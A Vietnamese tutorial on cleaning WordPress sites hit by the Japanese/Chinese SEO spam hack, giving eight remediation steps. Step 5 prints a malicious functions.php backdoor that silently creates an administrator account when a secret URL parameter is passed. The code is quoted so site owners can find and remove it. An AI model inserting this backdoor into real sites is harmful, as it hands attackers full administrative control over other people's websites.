Trong thời gian gần đây có rất nhiều website của người dùng Wordpress bị lỗi index nhiều link trên kết quả tìm kiếm của Google, bằng tiếng Nhật hoặc tiếng Trung Quốc khi kiểm tra index website trên Google.
Muốn biết website của bạn có bị nhiễm mã độc này không, một cách đơn giản trên trình duyệt Chrome bạn gõ: site:tên-miền-của-bạn, ví dụ nếu có kết quả link như bên dưới chứng tỏ website của bạn bị nhiễm mã độc.
Một trong những nguyên nhân dẫn đến việc website của bạn bị index URL tiếng Nhật, tiếng Trung như trên do cài plugin hoặc theme từ các nguồn không đáng tin cậy, dẫn đến việc bị cài mã độc vào theme và plugin, một khi nó hoạt động sẽ chiếm quyền website và index các URL của chúng để lấy backlink.
Để phòng tránh, bạn nên tải các plugin và theme wordpress từ những địa chỉ tin cậy và nguồn gốc rõ ràng, được nhiều người sử dụng có lượt đánh giá cao.
Tuy nhiên một khi bạn đã bị nhiễm mã độc trên thì cách thức sau đây sẽ hướng dẫn bạn thực hiện xử lý tình trạng này:
Bước 1- Kiểm tra và xóa file htaccess cũ bằng cách vào trang quản trị và thực hiện cập nhật permalink
Bước 2- Kiểm tra file wp-blog-header.php, XMLRPC xem có bị gắn shell, nếu có hãy loại bỏ đoạn code shell
Bước 3- Xóa file sitemap.xml cũ đi, tạo gen lại sitemap mới
Bước 4- Tìm và xóa tất cả file shell .php trong thư mục wp-content/uploads trên hosting. Trường hợp nếu không tìm được thì tốt nhất bạn nên chặn thực thi php trong thư mục này bằng cách tạo file .htaccess trong uploads, gán đoạn code dưới đây vào:
<FilesMatch "\.((php[0-9]?)|p?html?|pl|sh|java|cpp|c|h|js|rc)$"> SetHandler None </FilesMatch>
Bước 5- Trong file functions.php ở thư mục theme, kiểm tra và xóa đoạn code độc bị chèn vào có cấu trúc như sau:
add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == 'h00h800f' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'guest', 'h00h800f' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
?>
<?php
Bước 6- Xóa tất cả các user lạ do hacker tạo ra
Bước 7- Bạn kiểm tra kỹ trong thư mục gốc có 1 file xác minh quyền google hãy xóa nó đi để hacker không có quyền xác minh google cho website của bạn.
Bước 8- Submit lại sitemap trong Google Webmaster Tool của bạn để đảm bảo từ khóa và các link thật của bạn không bị mất TOP trên công cụ tìm kiếm.
Ngoài ra để đảm bảo và chắc chắn hơn nữa tốt nhất bạn nên đổi lại Password của hosting cũng như mật khẩu của User Database và mật khẩu tài khoản admin đăng nhập trang wp-admin của bạn.
Chúc các bạn thành công !